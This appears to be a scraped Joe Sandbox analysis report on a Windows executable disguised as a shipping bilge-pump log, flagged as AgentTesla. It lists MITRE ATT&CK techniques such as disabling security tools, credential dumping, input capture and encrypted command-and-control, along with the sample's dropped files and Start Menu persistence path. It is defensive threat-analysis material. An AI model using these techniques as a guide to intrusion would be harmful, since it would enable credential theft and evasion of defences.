Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dll.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newfile.exe.log

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\newfile\newfile.exe

\Device\ConDrv

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre